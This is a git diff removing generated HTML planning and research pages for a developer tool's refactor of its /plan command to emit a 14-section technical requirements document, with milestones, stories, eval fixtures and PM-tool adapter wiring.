  3. One TRD, two domains. Same 14-section template applies to backend and infra work. /plan's SKILL.md carries domain-aware prompting per section (backend interpretation + infra interpretation), and the eval accepts n/a — <reason> as an escape for sections that genuinely don't apply (e.g., §4 Product Journey on a pure-state infra change).
  4. -
  5. §14 Rollback Strategy is a first-class section — preserves the strongest property of today's plan-architecture.md.
  6. -
  7. Old feature folders are left untouched. EPIC-1-S3 explicitly guards against deleting existing plan-architecture.md files. Git history is the archive.
  8. -
  9. M1 ships as a single PR. Generator, schema, and eval land together. The eval cannot ship before the generator (no fixture to validate); the generator should not ship without the eval (regression risk on first re-run). Land them atomically.
  10. -
  11. design_refs[] is additive and zero-risk. Bumps sidecar schema 1.1 → 1.2. Adapters that don't understand the field ignore it; no /pm-sync schema break (EPIC-4-S3 is the additive forward-link wiring).
  12. -
  13. LLD references are TODO placeholders in v1. design_refs[] entries with doc: "lld" carry anchor_url: null and label: "TODO: link when /lld <component> lands". When /lld ships in a later epic, those placeholders get resolved. LLDs are typically backend-only.
  14. -
  15. Eval is the structural enforcement mechanism. Per CLAUDE.md eval-coverage mandate, M1 ships with two positive fixtures (one backend, one infra), one missing-section negative per required section, one drift-by-addition negative, and one "vague-prose-instead-of-n/a" negative. RED → GREEN paper trail captured in the PR body (EPIC-3-S3).
  16. -
-

Deliverables (per milestone)

-

M1 — TRD cutover (one PR)

-
    -
  • shield/commands/plan.md — emits trd.md not plan-architecture.md
  • -
  • shield/skills/general/plan-docs/SKILL.md — 14-section TRD template + generation prompt with domain-aware section guidance (backend interpretation + infra interpretation per section)
  • -
  • shield/skills/general/plan-docs/sidecar-schema.md — schema bumped to 1.2 with design_refs[] documented
  • -
  • shield/schema/output-paths.yamlplan_arch_md/plan_arch_html replaced by plan_trd_md/plan_trd_html
  • -
  • shield/evals/plan-trd.yaml — 2 positives (backend + infra) + 14 missing-section negatives + 1 drift-by-addition negative + 1 vague-prose-instead-of-n/a negative
  • -
  • shield/evals/plan-trd/fixtures/positive-backend/ — full 14-section TRD fixture for a backend feature
  • -
  • shield/evals/plan-trd/fixtures/positive-infra/ — full 14-section TRD fixture for an infra change (with n/a — <reason> on at least one section)
  • -
  • shield/evals/plan-trd/fixtures/missing-*/ — 14 missing-section negative fixtures
  • -
  • shield/evals/plan-trd/fixtures/extra-section/ — drift-by-addition negative fixture
  • -
  • shield/evals/plan-trd/fixtures/vague-tbd/ — section with "TBD" instead of n/a — <reason>; eval must fail
  • -
-

M2 — Review + sync wiring (one PR)

-
    -
  • shield/skills/general/plan-review/SKILL.md — 14-section presence rule + stale-anchor rule + duplication-detection rule
  • -
  • shield/commands/pm-sync.md — describes design_refs[] forwarding
  • -
  • shield/adapters/<each>/... — Confluence, Jira, ClickUp, Notion adapters forward design_refs[] as web links
  • -
  • shield/evals/plan-review-trd.yaml — fixtures exercising both new review rules
  • -
  • Per-adapter eval fixtures
  • -
-

M3 — Drift + duplication hardening (one PR)

-
    -
  • shield/skills/general/plan-docs/sidecar-schema.md — schema bumped to 1.3 with last_aligned_with
  • -
  • shield/skills/general/implement/SKILL.md (or equivalent) — updates last_aligned_with on story close
  • -
  • shield/skills/general/plan-review/SKILL.md — implementation-manual lint rule
  • -
  • Eval fixtures for both new rules
  • -
-

Rollback strategy

-

The refactor is a direct cutover; reversibility cost is low.

-
    -
  • Forward: Three PRs (M1, M2, M3), sequenced by depends_on.
  • -
  • Reversal: Revert plan-docs/SKILL.md to the pre-refactor template + restore plan-architecture.md generation. Existing trd.md files in feature folders remain readable. design_refs[] is optional everywhere, so removing it is a no-op for downstream adapters. last_aligned_with is also optional and reverting drops it without breaking older sidecars.
  • -
  • No migration: Pre-refactor feature folders keep their plan-architecture.md — no rewrite, no script.
  • -
-

Out of scope

-

The following are deferred and tracked in plan.json metadata.out_of_scope:

-
    -
  • /lld <component> command (template locked, command is a separate epic).
  • -
  • Adapter auto-creation of Confluence/Notion design-doc pages.
  • -
  • Structured ClickUp/Notion relationships beyond URL fields.
  • -
  • Migration tool for existing plan-architecture.md.
  • -
-

What to do next

-
    -
  • /plan-review docs/shield/plan-trd-refactor-20260524/plan.json — multi-agent review against the rubric.
  • -
  • /pm-sync docs/shield/plan-trd-refactor-20260524/plan.json --tool clickup (or jira, notion) — sync stories to your PM tool.
  • -
  • /implement — TDD-driven implementation, starting with EPIC-3-S1 (positive eval fixture) to anchor the RED → GREEN trail.
  • -
- -
-
Generated by Shield
- - diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/plan.html b/docs/shield/plan-trd-refactor-20260524/outputs/plan.html deleted file mode 100644 index 722fc9fe..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/plan.html +++ /dev/null @@ -1,430 +0,0 @@ - - - - - -Plan — plan-trd-refactor-20260524 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

Plan — /plan TRD refactor

-

Feature: plan-trd-refactor-20260524 · Phase: v1 cutover · Source: research.md · plan-architecture.md -Sidecar: plan.json (schema v1.1)

-

Milestones

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
IDNameOutcomeDepends on
M1TRD cutover/plan emits trd.md (14 sections, stable anchors, domain-aware prompting for backend/infra/mixed, atomic write, provenance stamp); plan.json carries optional design_refs[]; JSON schema validator wired; recurring CI gate runs the eval; coverage = 3 positives (backend + infra + mixed) + 16 negatives.
M2Review + sync wiring/plan-review grades against 14-section rubric (with n/a — <reason> escape) + duplication rule + stale-anchor rule; /pm-sync adapters forward design_refs[] as web links with idempotent upsert (sha256 globalId).M1
M3Drift + duplication hardeninglast_aligned_with metadata + implementation-manual lint rule.M2
-
-

EPIC-1 · TRD generation and storage · M1

-

EPIC-1-S1 · Author the canonical 14-section TRD template with domain-aware prompting · priority: high

-

Encode the 14-section TRD template (Document Overview through Rollback Strategy) in plan-docs/SKILL.md or a sibling templates.md. Each section has TWO authoring-guidance paragraphs: one for backend interpretation, one for infra interpretation. Sections that may not apply to one domain are documented with the n/a — <reason> escape pattern from the LLD sample's §12. Each section header in the emitted markdown carries an explicit {#section-id} kebab-case anchor.

-

Tasks

-
    -
  • Add a 'TRD template' subsection to shield/skills/general/plan-docs/SKILL.md (or extend templates.md) listing all 14 section titles, slug IDs, and per-domain authoring guidance sourced from research.md §What the Industry Recommends.
  • -
  • Define the canonical slug allow-list: ['document-overview','problem-statement','objective-scope','product-journey','functional-requirements','non-functional-requirements','high-level-design','alternatives-considered','cross-cutting-concerns','milestones','apis-involved','open-questions','references','rollback-strategy'].
  • -
  • Document the explicit {#section-id} markdown-anchor convention used by /plan output.
  • -
  • Document the n/a — <reason> escape: any section may declare n/a — <reason> when it genuinely doesn't apply (typical use: §4 on pure-infra plans). Vague TBDs and silent omissions are not allowed.
  • -
  • Per-section domain guidance must explicitly call out where the infra interpretation differs from backend (notably §4, §5, §6, §7, §11, §14).
  • -
-

Acceptance criteria

-
    -
  • shield/skills/general/plan-docs/SKILL.md (or templates.md) contains the 14-section TRD template with slug IDs and per-domain authoring guidance.
  • -
  • The slug allow-list is published as a machine-readable list (YAML or JSON sidecar under shield/schema/) so the eval can import it; the list has exactly 14 entries.
  • -
  • A reader following plan-docs/SKILL.md can identify which section a given heading belongs to AND which domain interpretation applies, without re-reading research.md.
  • -
  • The n/a — <reason> escape pattern is documented with at least one worked example per applicable section.
  • -
-

EPIC-1-S2 · Update /plan to emit trd.md (unified backend + infra) · priority: high

-

Modify shield/commands/plan.md and shield/skills/general/plan-docs/SKILL.md so /plan writes trd.md with all 14 sections for both backend and infrastructure features. Stop emitting plan-architecture.md going forward. Direct cutover: no feature flag, no side-by-side period. The generation prompt detects the dominant domain and surfaces the right per-section authoring guidance (backend vs infra) for the LLM.

-

Tasks

-
    -
  • Replace the 'Generate plan-architecture.md' step in shield/commands/plan.md with 'Generate trd.md per the unified 14-section template'.
  • -
  • Update shield/skills/general/plan-docs/SKILL.md generation prompt to walk the 14 sections, select the domain-appropriate authoring guidance per section, and emit explicit {#section-id} anchors.
  • -
  • Domain detection: reuse the existing detection (*.tf / atmos.yaml / Chart.yaml → infra; pom.xml / pyproject.toml / package.json / go.mod → backend). Mixed → annotate per section.
  • -
  • Update shield/schema/output-paths.yaml: replace plan_arch_md with plan_trd_md ({output_dir}/{feature}/trd.md) and plan_arch_html with plan_trd_html ({output_dir}/{feature}/outputs/trd.html). Mirror in shield/commands/plan.md outputs: frontmatter.
  • -
  • Update the render-markdown helper invocation in plan-docs/SKILL.md to render trd.md to outputs/trd.html.
  • -
-

Acceptance criteria

-
    -
  • Running /plan in a fresh feature folder writes docs/shield/{feature}/trd.md and docs/shield/{feature}/outputs/trd.html.
  • -
  • /plan no longer writes plan-architecture.md anywhere.
  • -
  • shield/schema/output-paths.yaml lists plan_trd_md and plan_trd_html; plan_arch_md and plan_arch_html are removed.
  • -
  • Running /plan on a feature folder with only infra markers produces a TRD where the infra interpretation is reflected in §4–7, §11, and §14 prose; sections like §4 may legitimately carry n/a — <reason>.
  • -
  • Running /plan on a feature folder with only backend markers produces a TRD where the backend interpretation is reflected in §4–7, §11, and §14 prose.
  • -
-

EPIC-1-S4 · Bump plugin version per CLAUDE.md mandate · priority: high

-

CLAUDE.md "Plugin isolation / Versioning" requires bumping .claude-plugin/marketplace.json and pyproject.toml in the same commit as any plugin update. Added per SRE P1-12 + DX P2.

-

Tasks

-
    -
  • Bump .claude-plugin/marketplace.json version field for the Shield plugin entry.
  • -
  • Bump pyproject.toml version in any package modified (shield/adapters/clickup/pyproject.toml, plus new adapter packages from EPIC-4-S0).
  • -
  • Update Shield's user-facing CHANGELOG (or create one if absent) noting the cutover from plan-architecture.md to trd.md and the schema 1.1 → 1.2 bump.
  • -
-

Acceptance criteria

-
    -
  • The M1 PR includes both version bumps in the same commit as the SKILL.md changes.
  • -
  • CHANGELOG mentions the cutover and the schema bump.
  • -
-
-

EPIC-1-S3 · Update existing-feature behavior on re-run · priority: medium

-

When /plan is re-run in a feature folder that has both an old plan-architecture.md and a new trd.md (or only an old plan-architecture.md), make the behavior deterministic: leave old plan-architecture.md untouched, write/overwrite trd.md. Old folders remain readable; no migration.

-

Tasks

-
    -
  • Add a guard in plan-docs/SKILL.md that does not delete plan-architecture.md if it exists.
  • -
  • Document the re-run behavior in shield/commands/plan.md ('plan-architecture.md is no longer generated; existing files are left in place').
  • -
-

Acceptance criteria

-
    -
  • Re-running /plan on a feature folder with an existing plan-architecture.md does not delete or modify that file.
  • -
  • The new trd.md is written alongside (or overwrites prior trd.md).
  • -
-
-

EPIC-2 · Story schema and design traceability · M1

-

EPIC-2-S1 · Extend plan.json schema with optional design_refs[] · priority: high

-

Add an optional design_refs[] array to each story in the plan.json sidecar. Shape: {doc, component?, section_id, anchor_url, label}. Bump sidecar schema to 1.2; preserve back-compat (missing field is ignored).

-

Tasks

-
    -
  • Edit shield/skills/general/plan-docs/sidecar-schema.md to add design_refs[] field on the story record with the field shape above.
  • -
  • Bump version key in the schema example from '1.1' to '1.2'.
  • -
  • Document back-compat: 1.1/1.0 sidecars without design_refs[] remain valid.
  • -
  • Add a 'design_refs[] field' subsection explaining the per-field semantics (doc ∈ {trd, lld, prd}; component for LLD scoping; anchor_url stable across heading renames).
  • -
-

Acceptance criteria

-
    -
  • shield/skills/general/plan-docs/sidecar-schema.md documents design_refs[] with version 1.2.
  • -
  • A plan.json with no design_refs[] still validates as 1.2.
  • -
  • A plan.json with design_refs[] populated validates as 1.2.
  • -
-

EPIC-2-S2 · Populate design_refs[] when /plan has TRD context · priority: high

-

When /plan generates stories, populate each story's design_refs[] with a forward link to the TRD section it implements. lld refs are emitted as TODO entries until /lld lands.

-

Tasks

-
    -
  • Update plan-docs/SKILL.md generation prompt: for each story, identify which TRD §7 (HLD), §10 (Milestones), or §11 (APIs Involved) section the story implements, and emit a design_refs entry pointing at trd.md#{section-id}.
  • -
  • For LLD references, emit placeholder entries with doc='lld', component=null, anchor_url=null, label='TODO: link when /lld <component> lands'.
  • -
  • Document the heuristic for picking section_id (story title keyword → TRD section anchor).
  • -
-

Acceptance criteria

-
    -
  • A /plan run on a feature with a trd.md emits at least one design_refs entry per story pointing at a real trd.md anchor.
  • -
  • Each story has at least one TRD design_ref; LLD refs are emitted as TODO placeholders.
  • -
  • Re-running /plan does not duplicate entries; existing entries are preserved or updated in place.
  • -
-
-

EPIC-2-S3 · Add JSON Schema validator for plan.json · priority: high

-

Two version bumps (1.1 → 1.2 → 1.3) without a machine-readable validator is the drift inflection. Add a pydantic/jsonschema validator now, invoked by /plan-review and the eval runner. New per Backend P1-7.

-

Tasks

-
    -
  • Create shield/scripts/validate_plan.py using pydantic (preferred — already in deps via clickup adapter) or jsonschema.
  • -
  • Schema definition lives at shield/schema/plan-sidecar.schema.json (machine-readable counterpart to sidecar-schema.md).
  • -
  • Validator is invoked by /plan-review (first check, before rubric) and the eval runner (in EPIC-3-S3 CI workflow).
  • -
  • Reject unknown doc enum values, enforce design_refs[] cardinality (min 1 per story when populated), reject sidecar versions newer than current.
  • -
-

Acceptance criteria

-
    -
  • uv run shield/scripts/validate_plan.py <path> exits 0 on valid sidecars and non-zero with a named error on invalid ones.
  • -
  • /plan-review invokes the validator before applying rubric checks and aborts on schema failure.
  • -
  • Sidecar version forward-compat behavior matches the policy in sidecar-schema.md.
  • -
-
-

EPIC-3 · Eval coverage for TRD format · M1

-

EPIC-3-S1 · Author positive TRD eval fixtures (backend + infra) · priority: high

-

Create two positive fixture trd.md files: one for a backend feature (full 14 sections populated with realistic content), one for an infra feature (full 14 sections with realistic content where infra interpretation applies; at least one section uses n/a — <reason> to exercise the escape pattern). The positive eval asserts: all 14 anchors present, each section non-empty OR carrying a valid n/a — <reason> line, slug allow-list matches.

-

Tasks

-
    -
  • Author shield/evals/plan-trd/fixtures/positive-backend/trd.md with all 14 sections (use Bytebite-style fictional feature so content is realistic).
  • -
  • Author shield/evals/plan-trd/fixtures/positive-infra/trd.md with all 14 sections (use a fictional terraform/atmos change — e.g., new VPC module, new Aurora cluster — so content is realistic). At least one section must use n/a — <reason> (e.g., §4 Product Journey marked n/a — declarative state change, no runtime path).
  • -
  • Author the corresponding plan.json sidecars with design_refs[] entries pointing at the fixture trd.md anchors.
  • -
  • Write shield/evals/plan-trd.yaml with both positive cases wired.
  • -
-

Acceptance criteria

-
    -
  • shield/evals/plan-trd/fixtures/positive-backend/trd.md contains all 14 sections with explicit {#section-id} anchors.
  • -
  • shield/evals/plan-trd/fixtures/positive-infra/trd.md contains all 14 sections with explicit {#section-id} anchors and uses n/a — <reason> on at least one section.
  • -
  • Running the eval on both positive fixtures passes (exit code 0).
  • -
  • The fixtures are self-contained: no external API calls, no LLM dispatches.
  • -
-

EPIC-3-S2 · Author missing-section + drift + vague-TBD negative fixtures · priority: high

-

For each of the 14 required sections, author a fixture trd.md that omits that section. Add one drift-by-addition fixture (unprompted 15th section). Add one vague-TBD fixture (section present but contents are 'TBD' instead of either real content or n/a — <reason>). The eval must fail on each with a named, distinguishable error.

-

Tasks

-
    -
  • For each section in the slug allow-list (14 entries), derive a positive fixture and remove only that section to create a negative fixture under shield/evals/plan-trd/fixtures/missing-{section-id}/trd.md.
  • -
  • Wire each negative fixture into shield/evals/plan-trd.yaml with expected_error including the missing section's slug.
  • -
  • Add one drift-by-addition negative fixture under shield/evals/plan-trd/fixtures/extra-section/: add an unprompted 15th section; eval fails with 'unexpected section'.
  • -
  • Add one vague-TBD negative fixture under shield/evals/plan-trd/fixtures/vague-tbd/: §6 Non-Functional Requirements contains only 'TBD' (no real content, no n/a — <reason>); eval fails with 'vague section content'.
  • -
-

Acceptance criteria

-
    -
  • 14 missing-section negative fixtures exist, one per required section.
  • -
  • Running the eval on each missing-section fixture fails with an error naming the missing section's slug.
  • -
  • The drift-by-addition fixture fails with an 'unexpected section' error.
  • -
  • The vague-TBD fixture fails with a 'vague section content' error (distinguishable from missing-section).
  • -
-

EPIC-3-S3 · Wire eval into CI / RED-GREEN paper trail · priority: high

-

Run the eval before and after the /plan command changes land to produce the RED→GREEN paper trail required by CLAUDE.md. Capture both runs in the implementation PR description.

-

Tasks

-
    -
  • Before any /plan command changes: run the eval and confirm RED (positive fixture missing trd.md → expected fail).
  • -
  • After /plan changes land: run the eval and confirm GREEN (3 positive fixtures pass; all 16 negatives — 14 missing-section + 1 drift + 1 vague-TBD — fail with the right named errors).
  • -
  • Capture both run outputs in the PR description.
  • -
-

Acceptance criteria

-
    -
  • PR body contains a 'RED' section showing the eval failing before the changes.
  • -
  • PR body contains a 'GREEN' section showing the eval passing 3 positives + failing all 16 negatives with named errors after the changes.
  • -
  • The eval is invocable via uv run shield/evals/run.py plan-trd (or equivalent existing eval runner).
  • -
-
-

EPIC-4 · /plan-review and /pm-sync wiring · M2

-

EPIC-4-S0 · Scaffold Jira / Confluence / Notion adapter packages · priority: high

-

Only shield/adapters/clickup/ exists today as a uv package. EPIC-4-S3 implies four adapters land in one story but three have no pyproject.toml, no tests/, no MCP server skeleton. Scaffold them first. New per Backend P0-3 (repo-grounded — verified).

-

Tasks

-
    -
  • Create shield/adapters/jira/ with pyproject.toml, server/ skeleton, tests/ with placeholder contract test, .mcp.json entry.
  • -
  • Same for shield/adapters/confluence/.
  • -
  • Same for shield/adapters/notion/.
  • -
  • Create shield/adapters/_common/design_refs.py exposing DesignRef, ForwardResult, ForwardError, and the forward_design_refs protocol interface.
  • -
  • Update top-level workspace pyproject if needed.
  • -
-

Acceptance criteria

-
    -
  • Each new adapter directory has a working pyproject.toml resolvable by uv sync.
  • -
  • Each new adapter has a placeholder contract test runnable under uv run pytest shield/adapters/<tool>/tests/.
  • -
  • shield/adapters/_common/design_refs.py exports the named types and protocol.
  • -
  • .mcp.json entries for new adapters are present (even if disabled until EPIC-4-S3).
  • -
-

EPIC-4-S1 · Add 14-section presence rule + stale-anchor rule to /plan-review · priority: high

-

Extend the /plan-review rubric to check that trd.md contains all 14 required sections with the canonical slug anchors. Sections containing n/a — <reason> pass; sections containing only 'TBD' or empty content fail. Report missing or vague sections as Critical severity.

-

Tasks

-
    -
  • Edit shield/skills/general/plan-review/SKILL.md to add a 'TRD section presence' rule that imports the slug allow-list (14 entries) and checks each anchor exists in trd.md.
  • -
  • Add a 'TRD section content' rule that, for each section, accepts either real content or a n/a — <reason> line; flags 'TBD'/empty.
  • -
  • Add corresponding eval fixtures under shield/evals/plan-review-trd/ exercising both rules (positive + missing-section + vague-TBD + n/a-without-reason).
  • -
-

Acceptance criteria

-
    -
  • /plan-review on a feature folder with a TRD missing any required section reports that section by slug as a Critical finding.
  • -
  • /plan-review on a feature folder with all 14 sections present (including any n/a — <reason> escapes) does not flag section presence or content.
  • -
  • /plan-review on a TRD with a section containing only 'TBD' flags it as a vague-content Critical finding.
  • -
  • /plan-review on a TRD with a section containing 'n/a' (no reason) flags it as a missing-reason finding.
  • -
-

EPIC-4-S2 · Add PRD↔TRD duplication-detection rule to /plan-review · priority: medium

-

Detect when a TRD section verbatim-restates content from the linked PRD. Use a substring-overlap heuristic on §2 Problem Statement and §5 Functional Requirements.

-

Tasks

-
    -
  • Add a 'TRD restates PRD' rule to /plan-review that compares trd.md §2 + §5 against the linked prd.md.
  • -
  • Define the substring-overlap threshold (e.g., flag if > 80 characters of consecutive verbatim overlap).
  • -
-

Acceptance criteria

-
    -
  • A fixture pair where trd.md §2 copies prd.md problem section verbatim produces a duplication finding.
  • -
  • A fixture pair where trd.md §2 paraphrases or summarizes the PRD problem section does not produce a finding.
  • -
- -

Update /pm-sync adapters (ClickUp + Jira/Confluence/Notion from EPIC-4-S0) to forward each story's design_refs[] entries as web links on the synced task with a deterministic idempotency key. Adapter interface contract locked across all four; observability structured; tool/access requirements documented. Per Backend P0-1, P0-3, P0-4 + DX P1-3 + Backend P1-8 + DX P1-13.

-

Adapter file paths (P1-3)

-
    -
  • shield/adapters/clickup/server/tools/sync.py — extend existing
  • -
  • shield/adapters/jira/server/tools/sync.py — new (per EPIC-4-S0)
  • -
  • shield/adapters/confluence/server/tools/sync.py — new
  • -
  • shield/adapters/notion/server/tools/sync.py — new
  • -
-

Adapter interface contract (P0-3)

-

Each adapter exposes:

-
def forward_design_refs(task_id: str, refs: list[DesignRef]) -> ForwardResult: ...
-
-

where ForwardResult = {created: int, skipped: int, errors: list[ForwardError]}. Both DesignRef and ForwardResult are defined in shield/adapters/_common/design_refs.py (from EPIC-4-S0).

-

Idempotency key: each DesignRef produces idempotency_key = sha256(story_id + anchor_url)[:32]. Adapters use this as:

-
    -
  • Jira: globalId on remote_issue_link
  • -
  • Confluence: name on remote_link
  • -
  • ClickUp: comparison key for URL custom-field dedup before write
  • -
  • Notion: comparison key for URL property dedup before write
  • -
-

Observability (P1-8): one action_log entry per ref with action='forward_design_ref', fields {story_id, adapter, anchor_url, outcome, idempotency_key}. Failures emit action='forward_design_ref_failed' with {error_class, http_status, idempotency_key}.

-

Tool & access requirements (P1-13):

-
    -
  • Integration tests use HTTP mocking via responses (preferred, credential-free CI) OR free-tier sandbox tenants when run live.
  • -
  • Live credentials come from SHIELD_<ADAPTER>_TOKEN env vars; CI defaults to mocked mode.
  • -
  • Python deps: Jira → requests; Confluence → requests; ClickUp → existing httpx; Notion → requests. All declared per-adapter.
  • -
-

Tasks

-
    -
  • Edit shield/commands/pm-sync.md to describe the forwarding contract, idempotency key, and per-adapter affordances.
  • -
  • Implement forward_design_refs in each of the four adapter files above.
  • -
  • Adapters with no link affordance log 'design_refs forwarding skipped — adapter does not support web links' instead of failing.
  • -
  • Adapter eval fixtures using responses / respx HTTP mocking.
  • -
  • (P0-4) Per-adapter idempotency test under shield/adapters/<tool>/tests/test_idempotency.py: run forward_design_refs twice with the same input against a mocked remote; assert second call produces 0 created and N skipped.
  • -
-

Acceptance criteria

-
    -
  • Running /pm-sync against each of {Confluence, Jira, ClickUp, Notion} forwards design_refs[] URLs on the synced task.
  • -
  • Running /pm-sync with empty design_refs[] succeeds with no side effect.
  • -
  • Adapter fixtures pass in shield/evals/.
  • -
  • (P0-4) Running /pm-sync twice on the same plan produces no duplicates — verified by per-adapter idempotency test.
  • -
  • (P0-3) All four adapters implement the same forward_design_refs(task_id, refs) → ForwardResult signature from _common/design_refs.py.
  • -
  • (P1-8) action_log entries emitted per ref with the documented fields.
  • -
-
-

EPIC-5 · Drift + duplication hardening · M3

-

EPIC-5-S1 · Add last_aligned_with metadata to plan.json · priority: medium

-

Add a top-level last_aligned_with field on plan.json that records the commit SHA of the most recent /implement run that closed a story. Countermeasure for undead-doc drift.

-

Tasks

-
    -
  • Bump plan.json schema to 1.3 to include last_aligned_with: string | null.
  • -
  • Update /implement to write last_aligned_with = HEAD-sha after a story status flips to 'done'.
  • -
  • Document semantics in sidecar-schema.md: null until first /implement run; updated on every subsequent story close.
  • -
-

Acceptance criteria

-
    -
  • Fresh plan.json has last_aligned_with: null.
  • -
  • After /implement closes a story, plan.json has last_aligned_with: <40-char hex sha>.
  • -
  • /pm-sync surfaces the value in the synced epic description.
  • -
-

EPIC-5-S2 · Add implementation-manual / pseudo-code lint rule to /plan-review · priority: low

-

Detect TRD §7 (HLD) sections that contain code blocks of more than N lines without an Alternatives Considered rationale within the same section — the 'design doc is really an implementation manual' anti-pattern from research.md.

-

Tasks

-
    -
  • Add a 'implementation-manual detection' rule to /plan-review.
  • -
  • Threshold: code block > 20 lines triggers; rule passes if §8 Alternatives Considered is non-empty.
  • -
  • Eval fixture: TRD with 30-line code block and empty §8 → flagged; TRD with 30-line code block and populated §8 → not flagged.
  • -
-

Acceptance criteria

-
    -
  • A TRD with a >20-line code block and an empty §8 produces a finding.
  • -
  • A TRD with a >20-line code block and a populated §8 does not produce a finding.
  • -
  • Threshold is documented in the rule's SKILL.md.
  • -
-
-

Out of scope (locked)

- - - - - - - - - - - - - - - - - - - - - - - - - -
ItemStatus
/lld <component> commandTemplate locked at 14 sections per PR #43 sample; authoring command is a separate epic.
Adapter auto-creation of design-doc pages in Confluence/Notionv2 enhancement.
Structured ClickUp/Notion relationships beyond URL fieldsv2 enhancement.
Migration tool for existing plan-architecture.mdDirect cutover; files stay readable in old folders.
-

Next steps

-
    -
  • /plan-review docs/shield/plan-trd-refactor-20260524/plan.json — multi-agent review.
  • -
  • /pm-sync docs/shield/plan-trd-refactor-20260524/plan.json --tool <clickup|jira|notion> — sync to PM tool.
  • -
  • /implement — start with EPIC-3-S1 (positive eval fixture) to anchor the RED → GREEN trail per CLAUDE.md.
  • -
- -
-
Generated by Shield
- - diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/research.html b/docs/shield/plan-trd-refactor-20260524/outputs/research.html deleted file mode 100644 index 7b673566..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/research.html +++ /dev/null @@ -1,837 +0,0 @@ - - - - - -Research — plan-trd-refactor-20260524 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

HLD/LLD Best Practices — Refactor /shield plan to Produce a TRD

-

Status: Proposed -Date: 2026-05-24 -Context: Shield's /plan produces a stories-first work-breakdown plus a plan-architecture.md companion. Industry convention is HLD → LLD; Shield is missing the high-level-design layer that justifies the work-breakdown. This research informs a refactor where /plan will emit a TRD = HLD + PM-lens milestones, with a separate LLD authored later per milestone, and stories that reference both HLD and LLD sections.

-

Decision

-

/plan should emit a TRD that combines (a) a high-level design grounded in IEEE 1016 / Sommerville / Pressman section coverage, (b) PM-lens milestones derived from the HLD, (c) a Rollback Strategy section preserving the strongest property of today's plan-architecture.md, and (d) a story breakdown where each story has an additive design_refs array pointing to TRD and LLD sections. The TRD replaces today's plan-architecture.md (direct cutover, no feature flag, no side-by-side period).

-

The TRD applies to both backend and infrastructure work — same 14-section template, same anchor IDs, same eval, same /plan-review rubric. A few sections (Product Journey, Functional Requirements, APIs Involved) have domain-aware interpretation in the /plan prompt; pure-state changes can declare n/a — <reason> per section as the explicit escape (a pattern borrowed from the LLD sample's §12). Two genuinely-infra-favored properties of today's ADR-flavored plan-architecture.md are preserved in the unified template:

-
    -
  • §8 Alternatives Considered — where the "5 numbered decisions with trade-offs" pattern lives (VPC peering vs Transit Gateway, Aurora vs RDS, single vs multi-region).
  • -
  • §14 Rollback Strategy — promoted to a first-class 14th section (terraform destroy plans, state recovery, blue/green flip back, traffic shift reversal for infra; data rollback, feature-flag toggle, key rotation, schema reversal for backend).
  • -
-

LLDs are component-scoped, not milestone-scoped. Each LLD document covers one C4-style Container or Component (a service, library, or module). A single LLD can be referenced by multiple milestones — milestone M1 and milestone M2 may both touch lld-component-auth.md, each updating different sections. The TRD §10 (Milestones) lists which LLDs each milestone touches; the LLDs themselves grow incrementally as milestones land. LLDs are typically authored for backend components where pre-implementation design has measurable value; infra plans rarely need an LLD layer since the declarative terraform/k8s code is the spec.

-

The recommended TRD template, reconciled across the reference TRD template and the industry consensus core, is:

-
    -
  1. Document Overview — title, status, authors, related PRD link, date
  2. -
  3. Problem Statement — what user/business/operational problem (links PRD; doesn't restate it)
  4. -
  5. Objective & Scope — goals, non-goals (Google design-doc convention)
  6. -
  7. Product Journey — end-to-end user flow (backend) / request lifecycle through the infra or operator journey (infra). n/a — <reason> permitted for pure-state changes.
  8. -
  9. Functional Requirements — what users can do (backend) / what the infra must support — capacity, regions, accounts, traffic patterns (infra). Links PRD where possible.
  10. -
  11. Non-Functional Requirements — SLAs, perf, security, observability (backend) / SLOs, RPO/RTO, cost ceiling, blast radius, multi-AZ tolerance (infra). Uber RFC convention.
  12. -
  13. High-Level Design — services + data flow (backend) / network topology + resource graph + dependency chain (infra). Block/sequence/architecture diagrams.
  14. -
  15. Alternatives Considered — what we didn't pick and why. For infra plans, this is where the ADR-style "5 numbered decisions with trade-offs" pattern lives — VPC peering vs Transit Gateway, Aurora vs RDS, single vs multi-region. Google + Larson convention.
  16. -
  17. Cross-Cutting Concerns — security, privacy, observability, multi-tenancy (backend) / IAM, encryption, observability, cost, multi-region, disaster recovery, compliance-region constraints (infra). Google + Uber.
  18. -
  19. Milestones — PM-lens phased breakdown derived from the HLD (backend) / phased rollout — dev → stage → prod, canary regions, blue/green flip, percentage cutover (infra). Reference TRD precedent.
  20. -
  21. APIs Involved — HTTP contracts touched (backend) / module interfaces + cloud-API surface + IAM boundaries + output values consumed by downstream stacks (infra).
  22. -
  23. Open Questions — known unknowns; surfaced for follow-up
  24. -
  25. References — links to PRD, LLDs (forward links, populated as LLDs land), ADRs, runbooks
  26. -
  27. Rollback Strategy — data rollback, feature-flag toggle, key rotation, schema reversal (backend) / terraform destroy plan, state recovery, blue/green flip back, traffic shift reversal (infra). Promoted from today's plan-architecture.md Rollback section.
  28. -
-

Each milestone in §10 declares which LLDs it touches. The LLDs are authored separately (a future /lld <component> command) and follow the C4 model's Container/Component levels — one LLD per service, library, or module. Stories in plan.json get an optional design_refs[] field with {doc, section_id, anchor_url, label} — additive, backward-compatible with /pm-sync.

-

n/a — <reason> escape per section. Following the LLD sample's §12 pattern, any of the 14 sections may declare n/a — <reason> when the section genuinely doesn't apply (e.g., §4 Product Journey on a pure-state infra change). Vague TBDs and silent omissions are not allowed — the eval rejects them — but an explicit "n/a" with rationale passes. This keeps the structure intact across domains without forcing pretend-content.

-

Canonical LLD template (14 sections — from sample PR #43)

-

The LLD template is anchored in tesseract PR #43docs/superpowers/specs/2026-05-18-lld-sample.html — a Bytebite user-signup sample that establishes the LLD shape Shield should generate:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#SectionAlways-on?Notes
1OverviewYesNames which epics/PRD milestones this LLD serves — bidirectional with TRD §10
2Scope & non-goalsYesIn-scope/out-of-scope lists
